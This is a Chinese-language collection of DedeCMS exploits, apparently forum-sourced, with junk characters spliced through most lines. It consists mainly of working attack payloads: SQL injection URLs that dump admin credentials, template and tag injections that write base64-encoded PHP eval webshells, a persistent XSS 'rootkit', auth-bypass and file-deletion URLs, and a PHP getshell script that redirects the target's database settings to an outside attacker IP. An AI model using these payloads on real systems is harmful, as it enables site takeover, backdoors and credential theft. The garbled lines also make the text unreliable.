|
|
, b, V) G. y# O! y V5 n
Dedecms 5.6 rss注入漏洞4 q5 ?- l' j7 _( Y, d
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
( C& k% r( T6 X z# h; R3 J4 r
]; n5 k6 C1 n
/ R# N* S$ o4 \. d4 }
; `* I. x1 Z, s5 a( C5 b- d- E, r# Z4 v% Q p$ [. q
! l* |, H' @, a! ~3 L# M
9 ]1 r! V1 i. O& O8 b4 K" M! _2 u/ D& L8 x* d0 a9 Y, R" K
0 D1 J0 ]' u; a5 K! O% U. A
DedeCms v5.6 嵌入恶意代码执行漏洞& p }7 v( v( p, j
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
, _ U* C3 G+ r. Y4 y发表后查看或修改即可执行
0 _0 h, A2 V8 g& ?a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
* M. X# T" ]+ s+ S. e0 K生成x.php 密码xiao,直接生成一句话。5 R' B' {. _$ f! @3 T/ }4 g
) U3 b5 k) a) M% g! v2 Q/ |# G; p) a/ `+ E
8 B, k3 p) F+ J/ J& o: ? v
+ H% J3 t# H& V" ~3 X0 ^: ] _5 W6 j, r
, `$ i( i$ |2 l' B
9 r! j4 I0 [* D4 }* U6 @; u" T& `. i2 S
Dede 5.6 GBK SQL注入漏洞
/ o- j( p" N" z/ d q7 Fhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
) H1 M: s ^) s( Phttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
. e% Y- \8 `! y0 {& ?2 yhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
! x! b7 B8 [# s; Q3 k* ^! ]) L/ U& m" a# G: M6 v
J3 f# g |/ e9 l$ ^/ E C1 o! d* L: m) X1 W) z- A, P8 X; U7 ]+ E
R% w( g( x# A9 |: {
' t( T) |" e# J: B) N0 o
2 s; r1 U6 ^5 v6 J. N0 G7 `- t$ o! q4 A3 |- S
5 x& }$ @& t. D/ PDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) B+ S s* k8 x+ f; Y( nhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ! V/ `6 w5 R# o1 c2 J j
+ R: G' G \/ @/ N1 D/ [6 `9 k+ J' k/ o0 a( W8 |: @
+ ?, Q: ^7 d! s& {
3 m1 W- H6 j! Z" J
9 Y& z' b, o- \
0 z! ]/ N! V5 t( UDEDECMS 全版本 gotopage变量XSS漏洞
! Z% o; C4 E# [0 m1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 6 v* S8 z. H' Y1 D. s8 g4 u
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="" n! K( Q' I* J5 w1 ?" o. I
l* V* K- s+ H+ B9 d& b" C( W8 s8 Z- ~' j3 A$ Q& r* e
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
( u& W0 r' }4 D5 |- Zhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
: W4 p9 w- H, g6 ?6 j! T
6 @5 n$ C, W0 m6 Z
* v7 G m% N6 r( L7 Dhttp://v57.demo.dedecms.com/dede/login.php4 Z: G; s: s I9 q |
3 [3 [9 P$ [3 C
9 v0 |% O# u$ n
color=Red]DeDeCMS(织梦)变量覆盖getshell
: B9 h7 G# R4 `6 N6 N6 @) o* F#!usr/bin/php -w4 f3 G; J% g z3 j
<?php
: _: w8 |9 S, y7 A8 Kerror_reporting(E_ERROR);+ |2 b& R; _% A
set_time_limit(0);
7 ]/ P! A& M4 u& C! r1 _1 i" |' M lprint_r('. K! I7 g7 y# F( c, K
DEDEcms Variable Coverage4 x" T4 K* g" U9 \8 c! M9 P. H
Exploit Author: www.heixiaozi.comwww.webvul.com4 X6 [ n6 U2 |2 s& S4 [( l
);" Y6 R7 y2 L/ o9 D
echo "\r\n";
5 U0 x% U" z" T+ U. C) ~+ {7 rif($argv[2]==null){: D: S5 N5 ]% U% z* X0 T+ }
print_r('
4 q3 }" f# f! Z# L X+---------------------------------------------------------------------------+% z# ~% N/ ^ L
Usage: php '.$argv[0].' url aid path
7 l+ c( w0 s- `2 W, Yaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/' M7 K" o# b- T0 p- G8 Y$ f8 P7 y
Example:, _& I7 I$ f' O, x- S) n
php '.$argv[0].' www.site.com 1 old
! g N, W) Z0 V- k6 u5 q3 X+---------------------------------------------------------------------------+
5 i" R: i' j5 b');
2 G+ R/ F; Y6 Y4 D% s3 M; U( rexit;! d; |; ~2 h! i
}
6 Z+ |3 Z6 B5 z7 | f, f/ B$url=$argv[1];% F9 Y- _" ^: Y1 v' d* a" u
$aid=$argv[2];5 e9 O. i% o' L% D ~
$path=$argv[3];
$ V8 j0 G7 N8 R. G5 z" J$exp=Getshell($url,$aid,$path);
3 U5 \' b4 C' e! ]2 J% jif (strpos($exp,"OK")>12){
: ` {- I& E$ [( oecho "3 K& }# W, S5 ]- ?% i% T
Exploit Success \n";- S: j$ v. M7 p' Q A/ X- |
if($aid==1)echo ": ?8 I' R. H8 p4 W5 @& _# t
Shell:".$url."/$path/data/cache/fuck.php\n" ;" F7 p4 R9 h: Z' G% \
$ K. r- |) F9 ~/ I
' q2 s* A' q; \& x }if($aid==2)echo "
$ k% |1 u2 ?* b4 M3 H( rShell:".$url."/$path/fuck.php\n" ;
' |3 B* X' i5 R+ h$ p% T2 v! Q. U4 J* e1 A7 c, W" i
& V% z' I; _! N7 B0 {. V/ Nif($aid==3)echo "
( A. x- s) N3 \& z' J$ e* LShell:".$url."/$path/plus/fuck.php\n";
( ^: v: v) m& B6 w" D B7 |) I6 I# b! v7 t5 D
; Z L8 H: D) `) x}else{
; I1 \( G* i+ \0 ^. s G( Z5 n' Jecho "
0 e* m( {/ U* k6 _! ?! o/ K: VExploit Failed \n";
+ C4 V7 O5 K4 u! `7 `) {}( P5 U( t- }3 `3 l$ Q
function Getshell($url,$aid,$path){
: a" ?% F$ J/ j$id=$aid;4 j( Q) W: Y ]) V6 r- X* Y& r
$host=$url;& v6 G: n1 D! d& M; g
$port="80";
& H$ h( A+ F: g2 C% h1 ]7 w$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";6 \% g$ s. E: x9 }8 T
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
) }$ ]9 u- t9 s3 V y$data .= "Host: ".$host."\r\n";! F: I' R4 P, H6 P# V
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
, Z" |; E& e \5 m8 B& j$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; P9 f3 {) K7 }2 a
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";) i8 D" Q3 X1 D% e& ^# D: y. r
//$data .= "Accept-Encoding: gzip,deflate\r\n";
% X H7 \7 C/ X1 h$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";* f& B9 h M0 P) c' p8 f
$data .= "Connection: keep-alive\r\n";; m" e5 @1 v- b
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ ` f3 T% n/ O' P# x" t, {$data .= "Content-Length: ".strlen($content)."\r\n\r\n";4 N1 S& a- m0 B8 \% c6 ^5 w6 C p
$data .= $content."\r\n";9 ^, F O1 ]9 }3 y3 E' s
$ock=fsockopen($host,$port);- r3 P. A" G& K# O- B' \, x' F
if (!$ock) {5 _: G3 k1 [8 Q- _9 j
echo "
|5 `$ O; B2 Y2 Z- {! yNo response from ".$host."\n";
& c3 D; U c9 d' v# R- Q}! O* G8 u7 j, R
fwrite($ock,$data);
2 ^( A9 {$ W/ i6 y; d/ Bwhile (!feof($ock)) {
+ c8 k e, n1 |. o( h( j8 u S" [% y" q$exp=fgets($ock, 1024);
' _9 Z) ]( p" @* ?6 vreturn $exp;: w D. S0 ^4 r
}
) x) W% j* w# l: E$ u}
: i0 ~2 @2 A# C
' m& l6 f4 z0 | _" o/ T
; [$ b3 ^' u( L2 g9 I) j$ K% f5 a?>
/ g9 D2 W+ E& `, i4 E- t0 r- B: s8 H! v
4 d% t: S. @- [/ O4 ]* w
3 ?( c+ B& c& Z$ Y: p9 z8 M7 J5 B/ ]% O& T
9 o3 P z3 D* l( n
6 ^- G: A ?3 {1 W5 e+ B' i' r# M' U0 ^/ [
% g9 Z; i1 u0 Z I" ^5 b
# t) j+ N# l0 k1 O) c4 _
5 p5 V k) k& G. k8 u3 C2 aDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
; _2 O- }. P( }+ l! ~) z, t8 bhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root$ c2 |4 V2 l/ ?/ |$ l6 }
: Y. }! a* t4 M R
8 o* T/ \$ h& K* Z; i5 i9 W' K+ n把上面validate=dcug改为当前的验证码,即可直接进入网站后台
' T8 R2 \# `6 D- f0 b% d
7 R( t M& c& a' \6 [. f6 a8 j% q+ W6 G
此漏洞的前提是必须得到后台路径才能实现2 e$ |# F0 H+ L/ P/ t8 C
4 X# V# s) n& f2 b7 B( U# C- o
. z- h' [' p% \1 R2 h
1 _! o9 e8 e h6 H' c
0 x0 H, ]' _' l' M m8 n
5 b# {3 J, O3 o4 ~ i# J- H' S
# m8 t9 C8 r1 z) \" C; E. j, c+ S6 x# r
* d1 A# w1 B8 w1 ~
" s- ^. _% b. A/ a2 t8 P" F. b) Q! \" x9 O& G* N
Dedecms织梦 标签远程文件写入漏洞! q! @: J" y% o+ q% C7 P7 p
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');& _2 G" ?' y, q8 c r/ ~
E) R7 w. r3 s- B# L. H; L; }7 D, S4 k) f+ k( d# L. U
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) j& S: N# K4 H- n) _% ]<form action="" method="post" name="QuickSearch" id="QuickSearch">$ h% H6 y+ B; y& t0 P) r# ~0 e
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />' R; y' R* X+ \; L0 h$ Y1 u1 Q
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />& `# @. |: R: O
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /># z# m8 A8 s! {( m1 g9 D8 F2 N
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
& @9 W. Z$ |0 r6 q' o0 l7 {<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
! @& N3 j" a0 V8 Z( h<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; \1 P1 O, x& C7 ^8 ?/ L5 U<input type="text" value="true" name="nocache" style="width:400">
- ]0 z/ y8 ]5 k M2 R1 Z0 i% E; ^<input type="submit" value="提交" name="QuickSearchBtn"><br />+ X5 ^) P. g" [& P- N' r* l
</form>8 w" Q$ {5 b: a+ G: r
<script> G* j3 E! ]* \" r- F
function addaction()
4 S% }+ w. ~# |7 m% ^2 j9 s{: C/ f/ p: e k2 T4 W5 O" A( _
document.QuickSearch.action=document.QuickSearch.doaction.value;" G9 V, j. g: j! S% I
}
( k+ C+ `* J* g7 X7 m</script>
i; k3 ^4 h* \; b( T' ]. I! I0 t- e) M0 m
. k8 E. H2 `( \+ @: |
2 y- C; ^! i2 y+ `: J* X
g( R- w5 d( s1 J) M( q, ?
( p5 V& V1 f S3 X( X& E1 w8 F
, }$ O# [0 `& H+ l G' ~& a* x, q5 ? ?' W
4 f5 s2 j1 y% P# H/ ^4 Y) P+ `0 [; d4 w* i
( _& T" a ~# ]# m
DedeCms v5.6 嵌入恶意代码执行漏洞
6 B p* ~! ? z. E注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
6 g3 |* Q& K6 N; Q, A8 K1 K; ca{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}( h- T" t7 I; N4 \
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得1 M5 ~# e! q' e5 `- D6 p1 R
Dedecms <= V5.6 Final模板执行漏洞2 z" ^, O, d( S) F+ ^: Z+ f; [
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
, n) `5 w" K: G. R) z9 Z: a1 X2 X( Puploads/userup/2/12OMX04-15A.jpg
: u& b3 p3 `% P3 B) Y# O# K4 X. r6 l$ t, P8 ]
* @# c% F, D+ q; _模板内容是(如果限制图片格式,加gif89a):& C; Z; {1 p9 M1 F" _
{dede:name runphp='yes'}) I0 {2 T! Q( l4 @# p
$fp = @fopen("1.php", 'a');/ J3 V S- q6 F6 O0 V1 \
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");. C2 Y' H: o# U6 M W3 E& h, ^
@fclose($fp);# U. A& ]& L! n# V
{/dede:name}0 y- w( `/ @2 B- C6 V6 D) c
2 修改刚刚发表的文章,查看源文件,构造一个表单:' X7 g2 o# z) Z* ]% ~; }: |
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">0 O' J+ d; S' E r. c# M' K5 @
<input type="hidden" name="dopost" value="save" />
V0 ~5 ?* s; k. `0 H( f9 G- D1 X# U<input type="hidden" name="aid" value="2" />: D8 J2 j" N" ]
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />) g/ w+ ^0 t4 j
<input type="hidden" name="channelid" value="1" />' m+ v) p% D: t" B8 F% B, e! A
<input type="hidden" name="oldlitpic" value="" />) d R( P" F9 N
<input type="hidden" name="sortrank" value="1275972263" />
* h5 k# p! p3 d& q1 b! h! F
; _1 x: K, w- {4 o( F
, t# g* F4 [9 d& O) G<div id="mainCp">% U6 N4 @# r/ P" O% a' F
<h3 class="meTitle"><strong>修改文章</strong></h3>& s8 W, L. r$ o: j4 t0 Z! O
M" b" |6 a- x: W3 n! V2 ~
0 d2 }1 B4 V1 z1 i<div class="postForm">
4 J6 h/ j) q0 y! z+ w<label>标题:</label>
' w$ j- d' K1 k0 {( i* m$ N<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
) H# D% @4 x; ~7 r4 H5 g3 ]& F$ F+ l5 @( b8 L( Q3 {
" B; P# k' m) w9 q3 `) b4 @<label>标签TAG:</label>
5 ~7 f5 ^ }: ?1 @. G1 i" r<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
7 `3 H7 d: @& y2 v% x ^
+ @" e0 C4 U1 K
J7 M6 j$ c8 O; S<label>作者:</label>
% c: ~. f( r! |( e, ^* v( n<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>0 J7 {. h6 S( G) E0 w3 }
9 X& H( L8 ^" P8 T; h
, J8 H! t! G. u* K. p<label>隶属栏目:</label>
4 O7 Z: D3 S9 g1 |$ ^( d<select name='typeid' size='1'>
8 |1 I/ G/ L0 ~ V8 h9 d<option value='1' class='option3' selected=''>测试栏目</option>
5 V1 D* D' R5 k/ U/ ^& e' a1 L6 j3 D</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
" x# U# O8 Z; y, A; G) }' M+ x/ V: E, t3 y1 B6 f3 @7 L
" r- B" [1 O4 V( I) J k1 z
<label>我的分类:</label>. s* H# |, W; k1 U
<select name='mtypesid' size='1'>
* |8 m: e8 B3 r1 t<option value='0' selected>请选择分类...</option>' q7 A3 ^) Y3 _* v* z
<option value='1' class='option3' selected>hahahha</option>
5 t2 f2 B4 y/ z4 G% D, {</select>
8 D& S. a9 E0 m3 i/ W3 K3 }
/ g2 c# w$ J. S
$ G/ Z0 r8 } R. |5 ?9 f7 F<label>信息摘要:</label>
6 k' j7 c2 P; a3 N<textarea name="description" id="description">1111111</textarea>* Y9 m9 H3 _: F7 J, g: M: @
(内容的简要说明)2 G0 @% O- y% A
7 a6 Z6 k9 H0 Q' v- c! B6 |! {1 x& z+ v- t
<label>缩略图:</label>/ D7 \* F% @; C# a5 _6 G9 X
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
" E" e! U1 U+ I: s& ? X4 R) l) `2 z
8 K6 b4 K+ `/ O: x& _5 R* ]( g<input type='text' name='templet'+ m0 m7 i& J, P' k9 C: h* z
value="../ uploads/userup/2/12OMX04-15A.jpg">: F, I) R1 f! l/ q
<input type='text' name='dede_addonfields', N! P! G# l; |. S7 M9 u
value="templet,htmltext;">(这里构造)3 N/ q7 Q- ]4 w8 P( A
</div> g* S5 n0 {6 {
5 i2 \; G0 H3 v1 I* u: a+ T
3 j) h- T4 r2 M7 C: T, e! {, f
<!-- 表单操作区域 -->% Z# a# e$ l8 \; E1 r9 S% C/ `
<h3 class="meTitle">详细内容</h3>
+ `8 f- c7 X7 t2 o, ?3 m( s! |* R- i. Y% o1 g" u
! Y7 B& Q- G, Y; N7 w9 C
<div class="contentShow postForm">
, R0 i3 n: Q/ {4 u V& W0 i<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
1 ^+ W9 _$ j8 l" B2 D7 i: `9 j/ P, R: \: q: i7 X; L0 v
4 z( _, P0 y/ Q; h
<label>验证码:</label>0 N! I4 `, @+ y
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
2 y6 D6 Z7 j& ?" J. X5 d<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
1 k- \' {$ c" @5 k. T" @/ t) C( u5 g1 a0 \; S% ?6 \6 q
5 ~7 r# l& U0 d2 P" T6 X& \) Y" r
<button class="button2" type="submit">提交</button>
& T( W1 q0 b7 p: D1 U, \<button class="button2 ml10" type="reset">重置</button>' C8 [3 f9 J' }7 L- h
</div>
$ G4 Z* Q' Q6 i1 i* q. k4 X, |8 C; |- w
3 q$ R3 e# h* A* a5 \& N
</div>4 N% n' I! z1 i! j
: I0 ~: A6 U* I) N
9 r) Y9 @, t C `( ]. C5 K</form>
1 F( u' P; q3 V, f6 |+ a2 ^2 ?$ P6 B8 \( }
# K1 C8 c% N0 [ N, {! b; ^7 r
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:; E; R. w) r3 B
假设刚刚修改的文章的aid为2,则我们只需要访问:! X9 ~- i/ ? p5 x: h [
http://127.0.0.1/dede/plus/view.php?aid=2
* l( [& J/ n( m0 v6 X6 S6 v7 q即可以在plus目录下生成webshell:1.php
) K! O5 u4 k# N
/ t7 |. M4 j( ]+ C" C/ D1 V' f
, v1 D, o/ w: }. ~2 o- t
1 Q* t. w: M+ i/ I1 U" h9 K! i$ |$ H* |4 ~7 k2 f; l; _
) X& q/ u7 @2 k3 Q7 A/ W7 }
- r! I' d% w$ l" O7 i$ g) x" O3 V, w3 E3 f+ t( |# [' t* O5 Q
% {- d7 [; I* G( O8 w3 k& j
. O% |# U5 M7 l; ]* J0 ?# P5 A' u$ S3 `3 p6 ?. C4 w. ~
! j- F& \3 V2 t$ q
8 l# o) H) w2 C
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
7 [: L+ ~! y1 N- a: uGif89a{dede:field name='toby57' runphp='yes'}2 a" {% l2 o) C+ ?
phpinfo();
6 z" B: T; {2 W& e J. d, o3 N{/dede:field}; c& X G/ h/ S1 o
保存为1.gif
7 { v& l1 @# k. f2 l1 J' d( R<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
X' q9 c+ d! q) [- N1 v4 p$ W/ v* ~<input type="hidden" name="aid" value="7" />
9 C/ O% V7 g2 y* e5 t6 J( L<input type="hidden" name="mediatype" value="1" /> 0 M1 p4 M2 Q$ N% W
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
# y& I' u+ B* t: ~; v5 V" ?<input type="hidden" name="dopost" value="save" /> - }, N( | O! t' |
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
# k4 S, |8 m9 ^1 Z9 ?7 T) z) n<input name="addonfile" type="file" id="addonfile"/>
8 m2 {9 T8 V. t& L<button class="button2" type="submit" >更改</button>
, N2 I/ H" v% N( g6 c' g</form>
, h, h/ {: P ` l. i% p9 i/ c5 l- y, D! v
" T% L/ k' T/ P& f% V m
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
) [8 x3 s: X, I1 P, T" m/ Y发表文章,然后构造修改表单如下:* Y, P! @0 p' ?) n R! S3 H
. ?) _8 F* T: M7 U
6 L3 m4 P) p3 x- J) d
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
6 d& j& r5 E/ c) K8 W. I& |<input type="hidden" name="dopost" value="save" />
: r. b, E- X9 i2 G; B( F<input type="hidden" name="aid" value="2" /> 5 F S4 b8 V% ~, o5 g- H4 q1 ^
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 1 Q1 X; o0 F; x/ i, q
<input type="hidden" name="channelid" value="1" />
! f0 q0 s0 B, V9 w/ C<input type="hidden" name="oldlitpic" value="" />
& Z& w5 p0 O; M9 T$ ~<input type="hidden" name="sortrank" value="1282049150" /> 9 G( _9 Q& n% A' ]3 Q
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! C7 U0 Y1 v5 S! c( I- ]<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
, ^1 ~/ R3 a6 f* R<select name='typeid' size='1'>
) ?! k$ d1 p7 p0 o, g<option value='1' class='option3' selected=''>Test</option>
5 g d3 R9 S7 z# _' ~<select name='mtypesid' size='1'> 2 z( P% ^5 j- M; V+ D
<option value='0' selected>请选择分类...</option> 0 x4 S, w/ F# T5 y4 l
<option value='1' class='option3' selected>aa</option></select> $ r1 {& {) a4 D) G& o
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
0 S# C+ l& I* `% I<input type='hidden' name='dede_addonfields' value="templet"> " U3 ^2 Z' E0 f
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> % u9 Q/ ~. [1 j
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
$ a- I+ z! d0 q! C* t: z# J! G<button class="button2" type="submit">提交</button> 6 p$ l! W! a7 J; C' u
</form>
8 m: G1 ~) A8 L" k2 s+ i+ H
/ x$ J! J! T& G* [% M u) ]
! g) M5 s2 v( ]! V$ W O1 g& F* A& A1 i+ M
, p) P' X4 ?; L5 v4 T5 _
& M2 G: i! F2 m% g0 s# x& D
8 V c% }4 s- l5 K; g) L
& D. A* H6 j+ ?1 Z1 {; m/ P2 N# `5 i5 u
) D- W! y' t8 {
1 l3 q4 L! L7 D/ E+ c$ G! \& @% J1 U! z6 A4 P
4 U: O/ b' a* M8 W4 ?! x/ F织梦(Dedecms)V5.6 远程文件删除漏洞
+ l6 k4 G0 ]! E8 r8 A U- Lhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif- L" t) l6 o; v: F% T! _7 {% J- a
- ?$ A5 P: {5 q
7 F. ~: ^1 t( s/ s
5 ^. Z9 D; M1 ^
6 U8 n. D4 c V7 E
2 I% U1 T" _* Q# l. s9 p; ~
2 A `; I0 L o- k. ~+ l2 a* o
! q: w) _: g1 T. K& J3 ^% C4 k, W' e( O9 e1 B$ E( J
# [6 {4 ~7 F K8 ?! b3 D9 V! l* l
1 }4 C9 F0 s: K* y9 v织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
9 V- x/ h2 ^3 B5 M; Nhttp://www.test.com/plus/carbuya ... urn&code=../../1 r' y6 x* W, l' Q" [3 Q$ ]
: |3 h) d- ~# Y7 @( a
1 d% y8 Y' t# e
. e; E4 u- R0 `6 |- P1 {+ c. o3 S& e
6 k" c& g7 s8 P
0 \6 o& Y$ i7 ?) t! w* T) ?
9 b: b" w6 d% H- h
4 a: w' E8 ~) u6 Y8 C) D5 O/ I) L! z
1 G4 S: T+ S& m( \) \4 JDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
6 Z" d- V2 G* s+ h# J% dplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`: U, F9 P& @* O6 S. K0 u* i; K. k
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
; j7 X1 `0 c5 ^, o! z) h! c/ Y! C! [
2 l* k1 n# j D: y9 ?' h! ?7 U0 u
$ ^: l' J& Y9 W2 d6 V' W1 U: |# H4 ]: K' ]5 g0 G; S! G
1 T5 J1 s5 D; i; _1 [# h( n2 j) w
- B! k) _4 w- |& C
2 l7 J; q! x% ? h
9 O8 F9 {) [- M8 h0 q3 q: B0 @
: e$ ]5 {1 z6 s
/ x4 h8 s( u& K0 S- U
& s+ P/ {$ R1 k, s3 t8 A: N1 M# s织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
2 W- {: S: m4 M) Q( M; s A8 ehttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='( ~/ r' t/ P( w# n: E, M; P
6 e' x0 ]. Y, C8 H" g. J4 ?
8 [: I: [. m. ^) s9 J6 e
% S4 D! N2 I* P! Y4 o, T
, r+ ^, ~& ~/ g
9 D m9 u2 b# v2 {7 b; B5 A( m
) S6 J( B5 q4 e( s3 v1 ^* p# P, C% [' B7 s+ W$ K% L
! r! z/ w- E. H( T2 @& z. o* ?; L& k- b/ Q. | U
* D/ g2 j! B8 a+ e8 p4 R织梦(Dedecms)select_soft_post.php页面变量未初始漏洞9 N: v1 v7 [5 s5 B3 q
<html>& o- j( b. ]8 K
<head>
/ b+ |! }& l( T' H, Q<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>& ^& p; T: Y8 s+ ]
